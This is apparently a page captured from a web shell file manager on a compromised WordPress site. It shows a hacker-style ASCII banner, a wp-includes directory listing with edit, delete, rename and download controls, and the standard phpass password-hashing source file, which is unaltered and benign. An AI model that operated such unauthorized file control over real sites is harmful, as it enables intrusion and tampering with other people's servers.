⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣴⣿⣿⣿⣷⣼⣿⠀⣴⠾⠷⠶⠦⡄⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢠⡤⢶⣦⣾⣿⣿⣿⣿⣿⣿⣿⠀⣿⣶⣶⣦⣄⠳⣤⣤⠄⠀⠀⠀ ⠀⠀⠀⢀⣼⣳⡿⢻⣿⣿⣿⣿⣿⣿⣿⣿⣶⣿⣿⣗⠈⠙⠻⣶⣄⡀⠀⠀⠀ ⠀⠀⠀⣰⠿⠁⢀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⠈⠳⣤⠀⠀ ⠀⠀⢀⡟⠀⢰⣿⠟⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⠉⠁⠈⠻⣶⣄⠀⠀⠈⠛⢦ www.github.com/caterscam ⠀⣀⡼⠃⠀⣼⡟⠀⠀⢸⣿⡿⠉⣿⡿⠿⠛⣿⡄⠀⠀⠀⠙⠿⣆⠀⠀⠀⠈ ⠈⠁⠀⠀⢸⡟⠀⠀⠀⢸⣿⠀⠀⣿⠁⠀⠀⠈⠃⠀⠀⠀⠀⠀⠘⢷⡄⠀⠀ ⠀⠀⠀⠀⣼⠃⠀⠀⠀⢸⡟⠀⠀⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⡆⠀ ⠀⠀⠀⣠⡏⠀⠀⠀⠀⣼⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠻⠃⠀⠀⠀⠀⣻⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ Current Dir: /dom834884/wp-includes/ [DIR] ID3 [ delete | rename ] [DIR] IXR [ delete | rename ] [DIR] PHPMailer [ delete | rename ] [DIR] Requests [ delete | rename ] [DIR] SimplePie [ delete | rename ] [DIR] Text [ delete | rename ] [DIR] assets [ delete | rename ] [DIR] block-bindings [ delete | rename ] [DIR] block-patterns [ delete | rename ] [DIR] block-supports [ delete | rename ] [DIR] blocks [ delete | rename ] [DIR] certificates [ delete | rename ] [DIR] css [ delete | rename ] [DIR] customize [ delete | rename ] [DIR] fonts [ delete | rename ] [DIR] html-api [ delete | rename ] [DIR] images [ delete | rename ] [DIR] interactivity-api [ delete | rename ] [DIR] js [ delete | rename ] [DIR] l10n [ delete | rename ] [DIR] php-compat [ delete | rename ] [DIR] pomo [ delete | rename ] [DIR] rest-api [ delete | rename ] [DIR] sitemaps [ delete | rename ] [DIR] sodium_compat [ delete | rename ] [DIR] style-engine [ delete | rename ] [DIR] theme-compat [ delete | rename ] [DIR] widgets [ delete | rename ] [FILE] admin-bar.php [ edit | delete | rename | download ] [FILE] atomlib.php [ edit | delete | rename | download ] [FILE] author-template.php [ edit | delete | rename | download ] [FILE] block-bindings.php [ edit | delete | rename | download ] [FILE] block-editor.php [ edit | delete | rename | download ] [FILE] block-i18n.json [ edit | delete | rename | download ] [FILE] block-patterns.php [ edit | delete | rename | download ] [FILE] block-template-utils.php [ edit | delete | rename | download ] [FILE] block-template.php [ edit | delete | rename | download ] [FILE] blocks.php [ edit | delete | rename | download ] [FILE] bookmark-template.php [ edit | delete | rename | download ] [FILE] bookmark.php [ edit | delete | rename | download ] [FILE] cache-compat.php [ edit | delete | rename | download ] [FILE] cache.php [ edit | delete | rename | download ] [FILE] canonical.php [ edit | delete | rename | download ] [FILE] capabilities.php [ edit | delete | rename | download ] [FILE] category-template.php [ edit | delete | rename | download ] [FILE] category.php [ edit | delete | rename | download ] [FILE] class-IXR.php [ edit | delete | rename | download ] [FILE] class-avif-info.php [ edit | delete | rename | download ] [FILE] class-feed.php [ edit | delete | rename | download ] [FILE] class-http.php [ edit | delete | rename | download ] [FILE] class-json.php [ edit | delete | rename | download ] [FILE] class-oembed.php [ edit | delete | rename | download ] [FILE] class-phpass.php [ edit | delete | rename | download ] [FILE] class-phpmailer.php [ edit | delete | rename | download ] [FILE] class-pop3.php [ edit | delete | rename | download ] [FILE] class-requests.php [ edit | delete | rename | download ] [FILE] class-simplepie.php [ edit | delete | rename | download ] [FILE] class-smtp.php [ edit | delete | rename | download ] [FILE] class-snoopy.php [ edit | delete | rename | download ] [FILE] class-walker-category-dropdown.php [ edit | delete | rename | download ] [FILE] class-walker-category.php [ edit | delete | rename | download ] [FILE] class-walker-comment.php [ edit | delete | rename | download ] [FILE] class-walker-nav-menu.php [ edit | delete | rename | download ] [FILE] class-walker-page-dropdown.php [ edit | delete | rename | download ] [FILE] class-walker-page.php [ edit | delete | rename | download ] [FILE] class-wp-admin-bar.php [ edit | delete | rename | download ] [FILE] class-wp-ajax-response.php [ edit | delete | rename | download ] [FILE] class-wp-application-passwords.php [ edit | delete | rename | download ] [FILE] class-wp-block-bindings-registry.php [ edit | delete | rename | download ] [FILE] class-wp-block-bindings-source.php [ edit | delete | rename | download ] [FILE] class-wp-block-editor-context.php [ edit | delete | rename | download ] [FILE] class-wp-block-list.php [ edit | delete | rename | download ] [FILE] class-wp-block-metadata-registry.php [ edit | delete | rename | download ] [FILE] class-wp-block-parser-block.php [ edit | delete | rename | download ] [FILE] class-wp-block-parser-frame.php [ edit | delete | rename | download ] [FILE] class-wp-block-parser.php [ edit | delete | rename | download ] [FILE] class-wp-block-pattern-categories-registry.php [ edit | delete | rename | download ] [FILE] class-wp-block-patterns-registry.php [ edit | delete | rename | download ] [FILE] class-wp-block-styles-registry.php [ edit | delete | rename | download ] [FILE] class-wp-block-supports.php [ edit | delete | rename | download ] [FILE] class-wp-block-template.php [ edit | delete | rename | download ] [FILE] class-wp-block-templates-registry.php [ edit | delete | rename | download ] [FILE] class-wp-block-type-registry.php [ edit | delete | rename | download ] [FILE] class-wp-block-type.php [ edit | delete | rename | download ] [FILE] class-wp-block.php [ edit | delete | rename | download ] [FILE] class-wp-classic-to-block-menu-converter.php [ edit | delete | rename | download ] [FILE] class-wp-comment-query.php [ edit | delete | rename | download ] [FILE] class-wp-comment.php [ edit | delete | rename | download ] [FILE] class-wp-customize-control.php [ edit | delete | rename | download ] [FILE] class-wp-customize-manager.php [ edit | delete | rename | download ] [FILE] class-wp-customize-nav-menus.php [ edit | delete | rename | download ] [FILE] class-wp-customize-panel.php [ edit | delete | rename | download ] [FILE] class-wp-customize-section.php [ edit | delete | rename | download ] [FILE] class-wp-customize-setting.php [ edit | delete | rename | download ] [FILE] class-wp-customize-widgets.php [ edit | delete | rename | download ] [FILE] class-wp-date-query.php [ edit | delete | rename | download ] [FILE] class-wp-dependencies.php [ edit | delete | rename | download ] [FILE] class-wp-dependency.php [ edit | delete | rename | download ] [FILE] class-wp-duotone.php [ edit | delete | rename | download ] [FILE] class-wp-editor.php [ edit | delete | rename | download ] [FILE] class-wp-embed.php [ edit | delete | rename | download ] [FILE] class-wp-error.php [ edit | delete | rename | download ] [FILE] class-wp-exception.php [ edit | delete | rename | download ] [FILE] class-wp-fatal-error-handler.php [ edit | delete | rename | download ] [FILE] class-wp-feed-cache-transient.php [ edit | delete | rename | download ] [FILE] class-wp-feed-cache.php [ edit | delete | rename | download ] [FILE] class-wp-hook.php [ edit | delete | rename | download ] [FILE] class-wp-http-cookie.php [ edit | delete | rename | download ] [FILE] class-wp-http-curl.php [ edit | delete | rename | download ] [FILE] class-wp-http-encoding.php [ edit | delete | rename | download ] [FILE] class-wp-http-ixr-client.php [ edit | delete | rename | download ] [FILE] class-wp-http-proxy.php [ edit | delete | rename | download ] [FILE] class-wp-http-requests-hooks.php [ edit | delete | rename | download ] [FILE] class-wp-http-requests-response.php [ edit | delete | rename | download ] [FILE] class-wp-http-response.php [ edit | delete | rename | download ] [FILE] class-wp-http-streams.php [ edit | delete | rename | download ] [FILE] class-wp-http.php [ edit | delete | rename | download ] [FILE] class-wp-image-editor-gd.php [ edit | delete | rename | download ] [FILE] class-wp-image-editor-imagick.php [ edit | delete | rename | download ] [FILE] class-wp-image-editor.php [ edit | delete | rename | download ] [FILE] class-wp-list-util.php [ edit | delete | rename | download ] [FILE] class-wp-locale-switcher.php [ edit | delete | rename | download ] [FILE] class-wp-locale.php [ edit | delete | rename | download ] [FILE] class-wp-matchesmapregex.php [ edit | delete | rename | download ] [FILE] class-wp-meta-query.php [ edit | delete | rename | download ] [FILE] class-wp-metadata-lazyloader.php [ edit | delete | rename | download ] [FILE] class-wp-navigation-fallback.php [ edit | delete | rename | download ] [FILE] class-wp-network-query.php [ edit | delete | rename | download ] [FILE] class-wp-network.php [ edit | delete | rename | download ] [FILE] class-wp-object-cache.php [ edit | delete | rename | download ] [FILE] class-wp-oembed-controller.php [ edit | delete | rename | download ] [FILE] class-wp-oembed.php [ edit | delete | rename | download ] [FILE] class-wp-paused-extensions-storage.php [ edit | delete | rename | download ] [FILE] class-wp-phpmailer.php [ edit | delete | rename | download ] [FILE] class-wp-plugin-dependencies.php [ edit | delete | rename | download ] [FILE] class-wp-post-type.php [ edit | delete | rename | download ] [FILE] class-wp-post.php [ edit | delete | rename | download ] [FILE] class-wp-query.php [ edit | delete | rename | download ] [FILE] class-wp-recovery-mode-cookie-service.php [ edit | delete | rename | download ] [FILE] class-wp-recovery-mode-email-service.php [ edit | delete | rename | download ] [FILE] class-wp-recovery-mode-key-service.php [ edit | delete | rename | download ] [FILE] class-wp-recovery-mode-link-service.php [ edit | delete | rename | download ] [FILE] class-wp-recovery-mode.php [ edit | delete | rename | download ] [FILE] class-wp-rewrite.php [ edit | delete | rename | download ] [FILE] class-wp-role.php [ edit | delete | rename | download ] [FILE] class-wp-roles.php [ edit | delete | rename | download ] [FILE] class-wp-script-modules.php [ edit | delete | rename | download ] [FILE] class-wp-scripts.php [ edit | delete | rename | download ] [FILE] class-wp-session-tokens.php [ edit | delete | rename | download ] [FILE] class-wp-simplepie-file.php [ edit | delete | rename | download ] [FILE] class-wp-simplepie-sanitize-kses.php [ edit | delete | rename | download ] [FILE] class-wp-site-query.php [ edit | delete | rename | download ] [FILE] class-wp-site.php [ edit | delete | rename | download ] [FILE] class-wp-speculation-rules.php [ edit | delete | rename | download ] [FILE] class-wp-styles.php [ edit | delete | rename | download ] [FILE] class-wp-tax-query.php [ edit | delete | rename | download ] [FILE] class-wp-taxonomy.php [ edit | delete | rename | download ] [FILE] class-wp-term-query.php [ edit | delete | rename | download ] [FILE] class-wp-term.php [ edit | delete | rename | download ] [FILE] class-wp-text-diff-renderer-inline.php [ edit | delete | rename | download ] [FILE] class-wp-text-diff-renderer-table.php [ edit | delete | rename | download ] [FILE] class-wp-textdomain-registry.php [ edit | delete | rename | download ] [FILE] class-wp-theme-json-data.php [ edit | delete | rename | download ] [FILE] class-wp-theme-json-resolver.php [ edit | delete | rename | download ] [FILE] class-wp-theme-json-schema.php [ edit | delete | rename | download ] [FILE] class-wp-theme-json.php [ edit | delete | rename | download ] [FILE] class-wp-theme.php [ edit | delete | rename | download ] [FILE] class-wp-token-map.php [ edit | delete | rename | download ] [FILE] class-wp-url-pattern-prefixer.php [ edit | delete | rename | download ] [FILE] class-wp-user-meta-session-tokens.php [ edit | delete | rename | download ] [FILE] class-wp-user-query.php [ edit | delete | rename | download ] [FILE] class-wp-user-request.php [ edit | delete | rename | download ] [FILE] class-wp-user.php [ edit | delete | rename | download ] [FILE] class-wp-walker.php [ edit | delete | rename | download ] [FILE] class-wp-widget-factory.php [ edit | delete | rename | download ] [FILE] class-wp-widget.php [ edit | delete | rename | download ] [FILE] class-wp-xmlrpc-server.php [ edit | delete | rename | download ] [FILE] class-wp.php [ edit | delete | rename | download ] [FILE] class-wpdb.php [ edit | delete | rename | download ] [FILE] class.wp-dependencies.php [ edit | delete | rename | download ] [FILE] class.wp-scripts.php [ edit | delete | rename | download ] [FILE] class.wp-styles.php [ edit | delete | rename | download ] [FILE] comment-template.php [ edit | delete | rename | download ] [FILE] comment.php [ edit | delete | rename | download ] [FILE] compat.php [ edit | delete | rename | download ] [FILE] cron.php [ edit | delete | rename | download ] [FILE] date.php [ edit | delete | rename | download ] [FILE] default-constants.php [ edit | delete | rename | download ] [FILE] default-filters.php [ edit | delete | rename | download ] [FILE] default-widgets.php [ edit | delete | rename | download ] [FILE] deprecated.php [ edit | delete | rename | download ] [FILE] embed-template.php [ edit | delete | rename | download ] [FILE] embed.php [ edit | delete | rename | download ] [FILE] error-protection.php [ edit | delete | rename | download ] [FILE] feed-atom-comments.php [ edit | delete | rename | download ] [FILE] feed-atom.php [ edit | delete | rename | download ] [FILE] feed-rdf.php [ edit | delete | rename | download ] [FILE] feed-rss.php [ edit | delete | rename | download ] [FILE] feed-rss2-comments.php [ edit | delete | rename | download ] [FILE] feed-rss2.php [ edit | delete | rename | download ] [FILE] feed.php [ edit | delete | rename | download ] [FILE] fonts.php [ edit | delete | rename | download ] [FILE] formatting.php [ edit | delete | rename | download ] [FILE] functions.php [ edit | delete | rename | download ] [FILE] functions.wp-scripts.php [ edit | delete | rename | download ] [FILE] functions.wp-styles.php [ edit | delete | rename | download ] [FILE] general-template.php [ edit | delete | rename | download ] [FILE] global-styles-and-settings.php [ edit | delete | rename | download ] [FILE] http.php [ edit | delete | rename | download ] [FILE] https-detection.php [ edit | delete | rename | download ] [FILE] https-migration.php [ edit | delete | rename | download ] [FILE] kses.php [ edit | delete | rename | download ] [FILE] l10n.php [ edit | delete | rename | download ] [FILE] link-template.php [ edit | delete | rename | download ] [FILE] load.php [ edit | delete | rename | download ] [FILE] locale.php [ edit | delete | rename | download ] [FILE] media-template.php [ edit | delete | rename | download ] [FILE] media.php [ edit | delete | rename | download ] [FILE] meta.php [ edit | delete | rename | download ] [FILE] ms-blogs.php [ edit | delete | rename | download ] [FILE] ms-default-constants.php [ edit | delete | rename | download ] [FILE] ms-default-filters.php [ edit | delete | rename | download ] [FILE] ms-deprecated.php [ edit | delete | rename | download ] [FILE] ms-files.php [ edit | delete | rename | download ] [FILE] ms-functions.php [ edit | delete | rename | download ] [FILE] ms-load.php [ edit | delete | rename | download ] [FILE] ms-network.php [ edit | delete | rename | download ] [FILE] ms-settings.php [ edit | delete | rename | download ] [FILE] ms-site.php [ edit | delete | rename | download ] [FILE] nav-menu-template.php [ edit | delete | rename | download ] [FILE] nav-menu.php [ edit | delete | rename | download ] [FILE] option.php [ edit | delete | rename | download ] [FILE] pluggable-deprecated.php [ edit | delete | rename | download ] [FILE] pluggable.php [ edit | delete | rename | download ] [FILE] plugin.php [ edit | delete | rename | download ] [FILE] post-formats.php [ edit | delete | rename | download ] [FILE] post-template.php [ edit | delete | rename | download ] [FILE] post-thumbnail-template.php [ edit | delete | rename | download ] [FILE] post.php [ edit | delete | rename | download ] [FILE] query.php [ edit | delete | rename | download ] [FILE] registration-functions.php [ edit | delete | rename | download ] [FILE] registration.php [ edit | delete | rename | download ] [FILE] rest-api.php [ edit | delete | rename | download ] [FILE] revision.php [ edit | delete | rename | download ] [FILE] rewrite.php [ edit | delete | rename | download ] [FILE] robots-template.php [ edit | delete | rename | download ] [FILE] rss-functions.php [ edit | delete | rename | download ] [FILE] rss.php [ edit | delete | rename | download ] [FILE] script-loader.php [ edit | delete | rename | download ] [FILE] script-modules.php [ edit | delete | rename | download ] [FILE] session.php [ edit | delete | rename | download ] [FILE] shortcodes.php [ edit | delete | rename | download ] [FILE] sitemaps.php [ edit | delete | rename | download ] [FILE] speculative-loading.php [ edit | delete | rename | download ] [FILE] spl-autoload-compat.php [ edit | delete | rename | download ] [FILE] style-engine.php [ edit | delete | rename | download ] [FILE] taxonomy.php [ edit | delete | rename | download ] [FILE] template-canvas.php [ edit | delete | rename | download ] [FILE] template-loader.php [ edit | delete | rename | download ] [FILE] template.php [ edit | delete | rename | download ] [FILE] theme-i18n.json [ edit | delete | rename | download ] [FILE] theme-previews.php [ edit | delete | rename | download ] [FILE] theme-templates.php [ edit | delete | rename | download ] [FILE] theme.json [ edit | delete | rename | download ] [FILE] theme.php [ edit | delete | rename | download ] [FILE] update.php [ edit | delete | rename | download ] [FILE] user.php [ edit | delete | rename | download ] [FILE] vars.php [ edit | delete | rename | download ] [FILE] version.php [ edit | delete | rename | download ] [FILE] widgets.php [ edit | delete | rename | download ] [FILE] wp-db.php [ edit | delete | rename | download ] [FILE] wp-diff.php [ edit | delete | rename | download ] Viewing: /dom834884/wp-includes/class-phpass.php <?php /** * Portable PHP password hashing framework. * @package phpass * @since 2.5.0 * @version 0.5 / WordPress * @link https://www.openwall.com/phpass/ */ # # Portable PHP password hashing framework. # # Version 0.5.4 / WordPress. # # Written by Solar Designer <solar at openwall.com> in 2004-2006 and placed in # the public domain. Revised in subsequent years, still public domain. # # There's absolutely no warranty. # # The homepage URL for this framework is: # # http://www.openwall.com/phpass/ # # Please be sure to update the Version line if you edit this file in any way. # It is suggested that you leave the main version number intact, but indicate # your project name (after the slash) and add your own revision information. # # Please do not change the "private" password hashing method implemented in # here, thereby making your hashes incompatible. However, if you must, please # change the hash type identifier (the "$P$") to something different. # # Obviously, since this code is in the public domain, the above are not # requirements (there can be none), but merely suggestions. # /** * Portable PHP password hashing framework. * * @package phpass * @version 0.5 / WordPress * @link https://www.openwall.com/phpass/ * @since 2.5.0 */ class PasswordHash { var $itoa64; var $iteration_count_log2; var $portable_hashes; var $random_state; function __construct($iteration_count_log2, $portable_hashes) { $this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) { $iteration_count_log2 = 8; } $this->iteration_count_log2 = $iteration_count_log2; $this->portable_hashes = $portable_hashes; $this->random_state = microtime(); if (function_exists('getmypid')) { $this->random_state .= getmypid(); } } function PasswordHash($iteration_count_log2, $portable_hashes) { self::__construct($iteration_count_log2, $portable_hashes); } function get_random_bytes($count) { $output = ''; if (@is_readable('/dev/urandom') && ($fh = @fopen('/dev/urandom', 'rb'))) { $output = fread($fh, $count); fclose($fh); } if (strlen($output) < $count) { $output = ''; for ($i = 0; $i < $count; $i += 16) { $this->random_state = md5(microtime() . $this->random_state); $output .= md5($this->random_state, TRUE); } $output = substr($output, 0, $count); } return $output; } function encode64($input, $count) { $output = ''; $i = 0; do { $value = ord($input[$i++]); $output .= $this->itoa64[$value & 0x3f]; if ($i < $count) { $value |= ord($input[$i]) << 8; } $output .= $this->itoa64[($value >> 6) & 0x3f]; if ($i++ >= $count) { break; } if ($i < $count) { $value |= ord($input[$i]) << 16; } $output .= $this->itoa64[($value >> 12) & 0x3f]; if ($i++ >= $count) { break; } $output .= $this->itoa64[($value >> 18) & 0x3f]; } while ($i < $count); return $output; } function gensalt_private($input) { $output = '$P$'; $output .= $this->itoa64[min($this->iteration_count_log2 + 5, 30)]; $output .= $this->encode64($input, 6); return $output; } function crypt_private($password, $setting) { $output = '*0'; if (substr($setting, 0, 2) === $output) { $output = '*1'; } $id = substr($setting, 0, 3); # We use "$P$", phpBB3 uses "$H$" for the same thing if ($id !== '$P$' && $id !== '$H$') { return $output; } $count_log2 = strpos($this->itoa64, $setting[3]); if ($count_log2 < 7 || $count_log2 > 30) { return $output; } $count = 1 << $count_log2; $salt = substr($setting, 4, 8); if (strlen($salt) !== 8) { return $output; } # We were kind of forced to use MD5 here since it's the only # cryptographic primitive that was available in all versions # of PHP in use. To implement our own low-level crypto in PHP # would have resulted in much worse performance and # consequently in lower iteration counts and hashes that are # quicker to crack (by non-PHP code). $hash = md5($salt . $password, TRUE); do { $hash = md5($hash . $password, TRUE); } while (--$count); $output = substr($setting, 0, 12); $output .= $this->encode64($hash, 16); return $output; } function gensalt_blowfish($input) { # This one needs to use a different order of characters and a # different encoding scheme from the one in encode64() above. # We care because the last character in our encoded string will # only represent 2 bits. While two known implementations of # bcrypt will happily accept and correct a salt string which # has the 4 unused bits set to non-zero, we do not want to take # chances and we also do not want to waste an additional byte # of entropy. $itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $output = '$2a$'; $output .= chr((int)(ord('0') + $this->iteration_count_log2 / 10)); $output .= chr(ord('0') + $this->iteration_count_log2 % 10); $output .= '$'; $i = 0; do { $c1 = ord($input[$i++]); $output .= $itoa64[$c1 >> 2]; $c1 = ($c1 & 0x03) << 4; if ($i >= 16) { $output .= $itoa64[$c1]; break; } $c2 = ord($input[$i++]); $c1 |= $c2 >> 4; $output .= $itoa64[$c1]; $c1 = ($c2 & 0x0f) << 2; $c2 = ord($input[$i++]); $c1 |= $c2 >> 6; $output .= $itoa64[$c1]; $output .= $itoa64[$c2 & 0x3f]; } while (1); return $output; } function HashPassword($password) { if ( strlen( $password ) > 4096 ) { return '*'; } $random = ''; if (CRYPT_BLOWFISH === 1 && !$this->portable_hashes) { $random = $this->get_random_bytes(16); $hash = crypt($password, $this->gensalt_blowfish($random)); if (strlen($hash) === 60) { return $hash; } } if (strlen($random) < 6) { $random = $this->get_random_bytes(6); } $hash = $this->crypt_private($password, $this->gensalt_private($random)); if (strlen($hash) === 34) { return $hash; } # Returning '*' on error is safe here, but would _not_ be safe # in a crypt(3)-like function used _both_ for generating new # hashes and for validating passwords against existing hashes. return '*'; } function CheckPassword($password, $stored_hash) { if ( strlen( $password ) > 4096 ) { return false; } $hash = $this->crypt_private($password, $stored_hash); if ($hash[0] === '*') { $hash = crypt($password, $stored_hash); } # This is not constant-time. In order to keep the code simple, # for timing safety we currently rely on the salts being # unpredictable, which they are at least in the non-fallback # cases (that is, when we use /dev/urandom and bcrypt). return $hash === $stored_hash; } }